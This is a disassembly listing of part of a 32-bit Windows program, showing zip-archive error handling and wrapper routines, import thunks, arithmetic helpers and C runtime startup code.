cmp dword ptr [ebp-10h], 500h
ja short loc_430EE7
cmp dword ptr [ebp-10h], 500h
jz loc_43101B
cmp dword ptr [ebp-10h], 200h
ja short loc_430EC8
cmp dword ptr [ebp-10h], 200h
jz loc_430FF7
cmp dword ptr [ebp-10h], 0
jz loc_430FDF
cmp dword ptr [ebp-10h], 100h
jz loc_430FEB
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_430EC8: ; CODE XREF: HLXc:00430E9D�j
cmp dword ptr [ebp-10h], 300h
jz loc_431003
cmp dword ptr [ebp-10h], 400h
jz loc_43100F
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_430EE7: ; CODE XREF: HLXc:00430E87�j
cmp dword ptr [ebp-10h], 800h
ja short loc_430F1C
cmp dword ptr [ebp-10h], 800h
jz loc_431039
cmp dword ptr [ebp-10h], 600h
jz loc_431027
cmp dword ptr [ebp-10h], 700h
jz loc_431030
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_430F1C: ; CODE XREF: HLXc:00430EEE�j
cmp dword ptr [ebp-10h], 10000h
jz loc_431042
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_430F2E: ; CODE XREF: HLXc:00430E6D�j
cmp dword ptr [ebp-10h], 80000h
ja short loc_430F98
cmp dword ptr [ebp-10h], 80000h
jz loc_431078
cmp dword ptr [ebp-10h], 50000h
ja short loc_430F79
cmp dword ptr [ebp-10h], 50000h
jz loc_43106F
cmp dword ptr [ebp-10h], 30000h
jz loc_43105D
cmp dword ptr [ebp-10h], 40000h
jz loc_431066
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_430F79: ; CODE XREF: HLXc:00430F4B�j
cmp dword ptr [ebp-10h], 60000h
jz loc_431093
cmp dword ptr [ebp-10h], 70000h
jz loc_43104B
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_430F98: ; CODE XREF: HLXc:00430F35�j
cmp dword ptr [ebp-10h], 4000000h
ja short loc_430FCD
cmp dword ptr [ebp-10h], 4000000h
jz loc_43109C
cmp dword ptr [ebp-10h], 1000000h
jz loc_431081
cmp dword ptr [ebp-10h], 2000000h
jz loc_43108A
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_430FCD: ; CODE XREF: HLXc:00430F9F�j
cmp dword ptr [ebp-10h], 5000000h
jz loc_4310A5
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_430FDF: ; CODE XREF: HLXc:00430EB0�j
mov dword ptr [ebp-8], offset aSuccess ; "Success"
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_430FEB: ; CODE XREF: HLXc:00430EBD�j
mov dword ptr [ebp-8], offset aCuldnTDuplicat ; "Culdn't duplicate handle"
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_430FF7: ; CODE XREF: HLXc:00430EA6�j
mov dword ptr [ebp-8], offset aCouldnTCreateO ; "Couldn't create/open file"
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_431003: ; CODE XREF: HLXc:00430ECF�j
mov dword ptr [ebp-8], offset aFailedToAlloca ; "Failed to allocate memory"
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_43100F: ; CODE XREF: HLXc:00430EDC�j
mov dword ptr [ebp-8], offset aErrorWritingTo ; "Error writing to file"
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_43101B: ; CODE XREF: HLXc:00430E90�j
mov dword ptr [ebp-8], offset aFileNotFoundIn ; "File not found in the zipfile"
jmp loc_4310AC
; ---------------------------------------------------------------------------
loc_431027: ; CODE XREF: HLXc:00430F04�j
mov dword ptr [ebp-8], offset aStillMoreDataT ; "Still more data to unzip"
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_431030: ; CODE XREF: HLXc:00430F11�j
mov dword ptr [ebp-8], offset aZipfileIsCorru ; "Zipfile is corrupt or not a zipfile"
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_431039: ; CODE XREF: HLXc:00430EF7�j
mov dword ptr [ebp-8], offset aErrorReadingFi ; "Error reading file"
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_431042: ; CODE XREF: HLXc:00430F23�j
mov dword ptr [ebp-8], offset aCallerFaultyAr ; "Caller: faulty arguments"
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_43104B: ; CODE XREF: HLXc:00430F8D�j
mov dword ptr [ebp-8], offset aCallerTheFileH ; "Caller: the file had already been parti"...
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_431054: ; CODE XREF: HLXc:00430E7A�j
mov dword ptr [ebp-8], offset aCallerCanOnlyG ; "Caller: can only get memory of a memory"...
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_43105D: ; CODE XREF: HLXc:00430F61�j
mov dword ptr [ebp-8], offset aCallerNotEnoug ; "Caller: not enough space allocated for "...
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_431066: ; CODE XREF: HLXc:00430F6E�j
mov dword ptr [ebp-8], offset aCallerThereWas ; "Caller: there was a previous error"
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_43106F: ; CODE XREF: HLXc:00430F54�j
mov dword ptr [ebp-8], offset aCallerAddition ; "Caller: additions to the zip have alrea"...
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_431078: ; CODE XREF: HLXc:00430F3E�j
mov dword ptr [ebp-8], offset aCallerMixingCr ; "Caller: mixing creation and opening of "...
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_431081: ; CODE XREF: HLXc:00430FB5�j
mov dword ptr [ebp-8], offset aZipBugInternal ; "Zip-bug: internal initialisation not co"...
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_43108A: ; CODE XREF: HLXc:00430FC2�j
mov dword ptr [ebp-8], offset aZipBugTryingTo ; "Zip-bug: trying to seek the unseekable"
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_431093: ; CODE XREF: HLXc:00430F80�j
mov dword ptr [ebp-8], offset aZipBugTheAntic ; "Zip-bug: the anticipated size turned ou"...
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_43109C: ; CODE XREF: HLXc:00430FA8�j
mov dword ptr [ebp-8], offset aZipBugTriedToC ; "Zip-bug: tried to change mind, but not "...
jmp short loc_4310AC
; ---------------------------------------------------------------------------
loc_4310A5: ; CODE XREF: HLXc:00430FD4�j
mov dword ptr [ebp-8], offset aZipBugAnIntern ; "Zip-bug: an internal error during flati"...
loc_4310AC: ; CODE XREF: HLXc:00430EC3�j
; HLXc:00430EE2�j ...
mov edx, [ebp-8]
push edx
call sub_43175E ; strlen
add esp, 4
mov [ebp-4], eax
cmp dword ptr [ebp+0Ch], 0
jz short loc_4310C7
cmp dword ptr [ebp+10h], 0
jnz short loc_4310CC
loc_4310C7: ; CODE XREF: HLXc:004310BF�j
mov eax, [ebp-4]
jmp short loc_431107
; ---------------------------------------------------------------------------
loc_4310CC: ; CODE XREF: HLXc:004310C5�j
mov eax, [ebp-4]
mov [ebp-0Ch], eax
mov ecx, [ebp-0Ch]
add ecx, 1
cmp ecx, [ebp+10h]
jbe short loc_4310E6
mov edx, [ebp+10h]
sub edx, 1
mov [ebp-0Ch], edx
loc_4310E6: ; CODE XREF: HLXc:004310DB�j
mov eax, [ebp-0Ch]
push eax
mov ecx, [ebp-8]
push ecx
mov edx, [ebp+0Ch]
push edx
call dword_43319C ; strncpy
add esp, 0Ch
mov eax, [ebp+0Ch]
add eax, [ebp-0Ch]
mov byte ptr [eax], 0
mov eax, [ebp-4]
loc_431107: ; CODE XREF: HLXc:004310CA�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43110B proc near ; CODE XREF: sub_4249D2+26�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43110B
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push 23Ch
call sub_431624
add esp, 4
mov [ebp+var_1C], eax
mov [ebp+var_4], 0
cmp [ebp+var_1C], 0
jz short loc_431150
mov ecx, [ebp+var_1C]
call sub_4315F0
mov [ebp+var_28], eax
jmp short loc_431157
; ---------------------------------------------------------------------------
loc_431150: ; CODE XREF: sub_43110B+36�j
mov [ebp+var_28], 0
loc_431157: ; CODE XREF: sub_43110B+43�j
mov eax, [ebp+var_28]
mov [ebp+var_18], eax
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_18]
mov [ebp+var_10], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_10]
call sub_42FFCE
mov ds:dword_43BD34, eax
cmp ds:dword_43BD34, 0
jz short loc_4311A2
mov edx, [ebp+var_10]
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
push eax
call sub_43161E
add esp, 4
xor eax, eax
jmp short loc_4311CA
; ---------------------------------------------------------------------------
loc_4311A2: ; CODE XREF: sub_43110B+7F�j
push 8
call sub_431624
add esp, 4
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
mov [ebp+var_14], ecx
mov edx, [ebp+var_14]
mov dword ptr [edx], 1
mov eax, [ebp+var_14]
mov ecx, [ebp+var_10]
mov [eax+4], ecx
mov eax, [ebp+var_14]
loc_4311CA: ; CODE XREF: sub_43110B+95�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_43110B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4311D8 proc near ; CODE XREF: sub_4249D2+37�p
; sub_4249D2+52�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jnz short loc_4311F5
mov ds:dword_43BD34, 10000h
mov eax, 10000h
jmp short loc_431237
; ---------------------------------------------------------------------------
loc_4311F5: ; CODE XREF: sub_4311D8+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx], 1
jz short loc_431214
mov ds:dword_43BD34, 80000h
mov eax, 80000h
jmp short loc_431237
; ---------------------------------------------------------------------------
loc_431214: ; CODE XREF: sub_4311D8+29�j
mov edx, [ebp+var_8]
mov eax, [edx+4]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov ecx, [ebp+var_4]
call sub_43007C
mov ds:dword_43BD34, eax
mov eax, ds:dword_43BD34
loc_431237: ; CODE XREF: sub_4311D8+1B�j
; sub_4311D8+3A�j
mov esp, ebp
pop ebp
retn
sub_4311D8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 134h
cmp dword ptr [ebp+8], 0
jnz short loc_43125E
mov ds:dword_43BD34, 10000h
mov eax, 10000h
jmp loc_431340
; ---------------------------------------------------------------------------
loc_43125E: ; CODE XREF: HLXc:00431248�j
mov eax, [ebp+8]
mov [ebp-134h], eax
mov ecx, [ebp-134h]
cmp dword ptr [ecx], 1
jz short loc_431286
mov ds:dword_43BD34, 80000h
mov eax, 80000h
jmp loc_431340
; ---------------------------------------------------------------------------
loc_431286: ; CODE XREF: HLXc:00431270�j
mov edx, [ebp-134h]
mov eax, [edx+4]
mov [ebp-4], eax
lea ecx, [ebp-130h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov ecx, [ebp-4]
call sub_43007C
mov ds:dword_43BD34, eax
cmp ds:dword_43BD34, 0
jnz loc_43133B
mov eax, [ebp+10h]
mov ecx, [ebp-130h]
mov [eax], ecx
mov edx, [ebp+10h]
mov eax, [ebp-28h]
mov [edx+108h], eax
mov ecx, [ebp+10h]
mov edx, [ebp-24h]
mov [ecx+10Ch], edx
mov eax, [ebp-20h]
mov [ecx+110h], eax
mov ecx, [ebp+10h]
mov edx, [ebp-1Ch]
mov [ecx+114h], edx
mov eax, [ebp-18h]
mov [ecx+118h], eax
mov ecx, [ebp+10h]
mov edx, [ebp-14h]
mov [ecx+11Ch], edx
mov eax, [ebp-10h]
mov [ecx+120h], eax
mov ecx, [ebp+10h]
mov edx, [ebp-0Ch]
mov [ecx+124h], edx
mov eax, [ebp+10h]
mov ecx, [ebp-8]
mov [eax+128h], ecx
lea edx, [ebp-12Ch]
push edx
mov eax, [ebp+10h]
add eax, 4
push eax
call sub_431758 ; strcpy
add esp, 8
loc_43133B: ; CODE XREF: HLXc:004312B1�j
mov eax, ds:dword_43BD34
loc_431340: ; CODE XREF: HLXc:00431259�j
; HLXc:00431281�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
cmp dword ptr [ebp+8], 0
jnz short loc_431361
mov ds:dword_43BD34, 10000h
mov eax, 10000h
jmp short loc_4313AB
; ---------------------------------------------------------------------------
loc_431361: ; CODE XREF: HLXc:0043134E�j
mov eax, [ebp+8]
mov [ebp-8], eax
mov ecx, [ebp-8]
cmp dword ptr [ecx], 1
jz short loc_431380
mov ds:dword_43BD34, 80000h
mov eax, 80000h
jmp short loc_4313AB
; ---------------------------------------------------------------------------
loc_431380: ; CODE XREF: HLXc:0043136D�j
mov edx, [ebp-8]
mov eax, [edx+4]
mov [ebp-4], eax
mov ecx, [ebp+18h]
push ecx
mov edx, [ebp+14h]
push edx
mov al, [ebp+10h]
push eax
mov ecx, [ebp+0Ch]
push ecx
mov ecx, [ebp-4]
call sub_430707
mov ds:dword_43BD34, eax
mov eax, ds:dword_43BD34
loc_4313AB: ; CODE XREF: HLXc:0043135F�j
; HLXc:0043137E�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 134h
cmp dword ptr [ebp+8], 0
jnz short loc_4313D2
mov ds:dword_43BD34, 10000h
mov eax, 10000h
jmp loc_4314BC
; ---------------------------------------------------------------------------
loc_4313D2: ; CODE XREF: HLXc:004313BC�j
mov eax, [ebp+8]
mov [ebp-134h], eax
mov ecx, [ebp-134h]
cmp dword ptr [ecx], 1
jz short loc_4313FA
mov ds:dword_43BD34, 80000h
mov eax, 80000h
jmp loc_4314BC
; ---------------------------------------------------------------------------
loc_4313FA: ; CODE XREF: HLXc:004313E4�j
mov edx, [ebp-134h]
mov eax, [edx+4]
mov [ebp-4], eax
lea ecx, [ebp-130h]
push ecx
mov edx, [ebp+14h]
push edx
mov al, [ebp+10h]
push eax
mov ecx, [ebp+0Ch]
push ecx
mov ecx, [ebp-4]
call sub_430707
mov ds:dword_43BD34, eax
cmp ds:dword_43BD34, 0
jnz loc_4314B7
mov edx, [ebp+18h]
mov eax, [ebp-130h]
mov [edx], eax
mov ecx, [ebp+18h]
mov edx, [ebp-28h]
mov [ecx+108h], edx
mov eax, [ebp+18h]
mov ecx, [ebp-24h]
mov [eax+10Ch], ecx
mov edx, [ebp-20h]
mov [eax+110h], edx
mov eax, [ebp+18h]
mov ecx, [ebp-1Ch]
mov [eax+114h], ecx
mov edx, [ebp-18h]
mov [eax+118h], edx
mov eax, [ebp+18h]
mov ecx, [ebp-14h]
mov [eax+11Ch], ecx
mov edx, [ebp-10h]
mov [eax+120h], edx
mov eax, [ebp+18h]
mov ecx, [ebp-0Ch]
mov [eax+124h], ecx
mov edx, [ebp+18h]
mov eax, [ebp-8]
mov [edx+128h], eax
lea ecx, [ebp-12Ch]
push ecx
mov edx, [ebp+18h]
add edx, 4
push edx
call sub_431758 ; strcpy
add esp, 8
loc_4314B7: ; CODE XREF: HLXc:0043142D�j
mov eax, ds:dword_43BD34
loc_4314BC: ; CODE XREF: HLXc:004313CD�j
; HLXc:004313F5�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4314C0 proc near ; CODE XREF: sub_4249D2+64�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jnz short loc_4314DD
mov ds:dword_43BD34, 10000h
mov eax, 10000h
jmp short loc_431527
; ---------------------------------------------------------------------------
loc_4314DD: ; CODE XREF: sub_4314C0+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx], 1
jz short loc_4314FC
mov ds:dword_43BD34, 80000h
mov eax, 80000h
jmp short loc_431527
; ---------------------------------------------------------------------------
loc_4314FC: ; CODE XREF: sub_4314C0+29�j
mov edx, [ebp+var_8]
mov eax, [edx+4]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov ecx, [ebp+var_4]
call sub_4308E2
mov ds:dword_43BD34, eax
mov eax, ds:dword_43BD34
loc_431527: ; CODE XREF: sub_4314C0+1B�j
; sub_4314C0+3A�j
mov esp, ebp
pop ebp
retn
sub_4314C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43152B proc near ; CODE XREF: sub_4249D2+72�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_0], 0
jnz short loc_431548
mov ds:dword_43BD34, 10000h
mov eax, 10000h
jmp short loc_4315A6
; ---------------------------------------------------------------------------
loc_431548: ; CODE XREF: sub_43152B+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx], 1
jz short loc_431567
mov ds:dword_43BD34, 80000h
mov eax, 80000h
jmp short loc_4315A6
; ---------------------------------------------------------------------------
loc_431567: ; CODE XREF: sub_43152B+29�j
mov edx, [ebp+var_8]
mov eax, [edx+4]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
call sub_430DF8
mov ds:dword_43BD34, eax
mov ecx, [ebp+var_4]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
push edx
call sub_43161E
add esp, 4
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
push ecx
call sub_43161E
add esp, 4
mov eax, ds:dword_43BD34
loc_4315A6: ; CODE XREF: sub_43152B+1B�j
; sub_43152B+3A�j
mov esp, ebp
pop ebp
retn
sub_43152B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+8], 0
jnz short loc_4315B8
mov al, 1
jmp short loc_4315C9
; ---------------------------------------------------------------------------
loc_4315B8: ; CODE XREF: HLXc:004315B2�j
mov eax, [ebp+8]
mov [ebp-4], eax
mov ecx, [ebp-4]
xor eax, eax
cmp dword ptr [ecx], 1
setz al
loc_4315C9: ; CODE XREF: HLXc:004315B6�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4315D0 proc near ; CODE XREF: sub_4308E2+339�p
; sub_4308E2+355�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_433214 ; _mbsstr
add esp, 8
pop ebp
retn
sub_4315D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4315F0 proc near ; CODE XREF: sub_43110B+3B�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0FFFFFFFFh
mov edx, [ebp+var_4]
mov dword ptr [edx+134h], 0FFFFFFFFh
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4315F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43161E proc near ; CODE XREF: sub_4210DD+16�p
; sub_4219B0+1D�p ...
jmp dword_433104
sub_43161E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431624 proc near ; CODE XREF: sub_42103D+1D�p
; sub_4240F6+10�p ...
jmp dword_433138
sub_431624 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43162A proc near ; CODE XREF: sub_421ACF+99�p
; sub_422C48+80�p ...
jmp dword_433134
sub_43162A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431630 proc near ; CODE XREF: sub_421C92+CC�p
jmp dword_433130
sub_431630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431636 proc near ; CODE XREF: HLXc:00422644�p
; sub_422A1E+15C�p ...
jmp dword_43312C
sub_431636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43163C proc near ; CODE XREF: HLXc:00422638�p
; sub_422A1E+C3�p ...
jmp dword_433128
sub_43163C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431642 proc near ; CODE XREF: HLXc:0042261C�p
; HLXc:00422659�p ...
jmp dword_433124
sub_431642 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431648 proc near ; CODE XREF: HLXc:00422610�p
; sub_422A1E+141�p ...
jmp dword_433120
sub_431648 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43164E proc near ; CODE XREF: HLXc:0042253A�p
; sub_422A1E+18�p ...
jmp dword_43311C
sub_43164E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431654 proc near ; CODE XREF: sub_422A1E+129�p
; sub_4252F7+114�p ...
jmp dword_433118
sub_431654 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43165A proc near ; CODE XREF: sub_4245AA+16C�p
; sub_4245AA+292�p ...
jmp dword_433114
sub_43165A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431660 proc near ; CODE XREF: sub_426584+7F�p
; sub_42692B+A9�p ...
jmp dword_433110
sub_431660 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431666 proc near ; CODE XREF: sub_426584+72�p
; sub_426584+CB�p ...
jmp dword_43310C
sub_431666 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43166C proc near ; CODE XREF: sub_424AE5+4A3�p
; sub_424AE5+5CB�p
jmp dword_433108
sub_43166C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431672 proc near ; CODE XREF: sub_424AE5+424�p
; sub_424AE5+552�p
jmp dword_433100
sub_431672 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431678 proc near ; CODE XREF: sub_4252F7+43�p
; sub_4252F7+54�p ...
jmp dword_4330FC
sub_431678 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43167E proc near ; CODE XREF: sub_425FC6+130�p
; sub_42852F+27C�p
jmp dword_4330F8
sub_43167E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431684 proc near ; CODE XREF: sub_425FC6+CC�p
; sub_425FC6+150�p ...
jmp dword_4330F4
sub_431684 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43168A proc near ; CODE XREF: sub_426584+DA�p
; sub_42692B+104�p ...
jmp dword_4330F0
sub_43168A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431690 proc near ; CODE XREF: sub_426584+B7�p
; sub_426584+122�p ...
jmp dword_4330EC
sub_431690 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431696 proc near ; CODE XREF: sub_426584+68�p
; sub_426584+112�p ...
jmp dword_4330E8
sub_431696 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43169C proc near ; CODE XREF: SEH_421109+5�j
; sub_431C1A+5�j ...
jmp dword_4331D8
sub_43169C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4316B0 proc near ; CODE XREF: sub_421109+7C�p
cmp cl, 40h
jnb short loc_4316CA
cmp cl, 20h
jnb short loc_4316C0
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_4316C0: ; CODE XREF: sub_4316B0+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_4316CA: ; CODE XREF: sub_4316B0+3�j
xor eax, eax
xor edx, edx
retn
sub_4316B0 endp
; =============== S U B R O U T I N E =======================================
sub_4316CF proc near ; DATA XREF: HLXc:off_434AE4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_431918
test [esp+4+arg_0], 1
jz short loc_4316E5
push esi
call sub_43161E
pop ecx
loc_4316E5: ; CODE XREF: sub_4316CF+D�j
mov eax, esi
pop esi
retn 4
sub_4316CF endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4316EC proc near ; CODE XREF: HLXc:00421217�p
; HLXc:004212F2�p ...
jmp dword_4331DC
sub_4316EC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_431700 proc near ; CODE XREF: HLXc:00421299�p
; sub_42146A+1E�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_431720
loc_43170C: ; CODE XREF: sub_431700+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_43170C
loc_431720: ; CODE XREF: sub_431700+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_431700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_431730 proc near ; CODE XREF: HLXc:0042174B�p
cmp cl, 40h
jnb short loc_43174B
cmp cl, 20h
jnb short loc_431740
shrd eax, edx, cl
sar edx, cl
retn
; ---------------------------------------------------------------------------
loc_431740: ; CODE XREF: sub_431730+8�j
mov eax, edx
sar edx, 1Fh
and cl, 1Fh
sar eax, cl
retn
; ---------------------------------------------------------------------------
loc_43174B: ; CODE XREF: sub_431730+3�j
sar edx, 1Fh
mov eax, edx
retn
sub_431730 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431752 proc near ; CODE XREF: sub_421ACF+29�p
; HLXc:00421C2F�p ...
jmp dword_4331E4
sub_431752 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431758 proc near ; CODE XREF: sub_422296+B1�p
; sub_422296+FA�p ...
jmp dword_4331FC
sub_431758 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43175E proc near ; CODE XREF: sub_422296+5A�p
; sub_42239F+B�p ...
jmp dword_4331F8
sub_43175E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431764 proc near ; CODE XREF: sub_4227A4+1E8�p
; sub_429F50+CA�p ...
jmp dword_4331C0
sub_431764 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43176A proc near ; CODE XREF: sub_422A1E+5�p
; sub_422BB1+5�p ...
jmp dword_4331BC
sub_43176A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431770 proc near ; CODE XREF: sub_422F54+E8�p
; sub_42309C+125�p ...
jmp dword_4331B8
sub_431770 endp
; =============== S U B R O U T I N E =======================================
sub_431776 proc near ; CODE XREF: sub_4317A2+4�p
arg_0 = dword ptr 4
cmp ds:dword_43BD70, 0FFFFFFFFh
jnz short loc_43178B
push [esp+arg_0]
call dword_433220 ; _onexit
pop ecx
retn
; ---------------------------------------------------------------------------
loc_43178B: ; CODE XREF: sub_431776+7�j
push offset dword_43BD6C
push offset dword_43BD70
push [esp+8+arg_0]
call sub_43191E ; __dllonexit
add esp, 0Ch
retn
sub_431776 endp
; =============== S U B R O U T I N E =======================================
sub_4317A2 proc near ; CODE XREF: sub_42850E+8�p
; sub_4319C1+21�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_431776
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_4317A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4317B4 proc near ; CODE XREF: sub_42EA04+11�p
; sub_43007C+4B8�p
jmp dword_43320C
sub_4317B4 endp
; ---------------------------------------------------------------------------
loc_4317BA: ; CODE XREF: HLXc:0043E644�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_434AE8
push offset sub_431946
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 68h
push ebx
push esi
push edi
mov [ebp-18h], esp
xor ebx, ebx
mov [ebp-4], ebx
push 2
call dword_43324C ; __set_app_type
pop ecx
or ds:dword_43BD6C, 0FFFFFFFFh
or ds:dword_43BD70, 0FFFFFFFFh
call dword_433248 ; __p__fmode
mov ecx, ds:dword_43BD54
mov [eax], ecx
call dword_433244 ; __p__commode
mov ecx, ds:dword_43BD50
mov [eax], ecx
mov eax, dword_433240
mov eax, [eax]
mov ds:dword_43BD68, eax
call nullsub_1
cmp ds:dword_437C30, ebx
jnz short loc_43183D
push offset sub_431942
call dword_43323C ; __setusermatherr
pop ecx
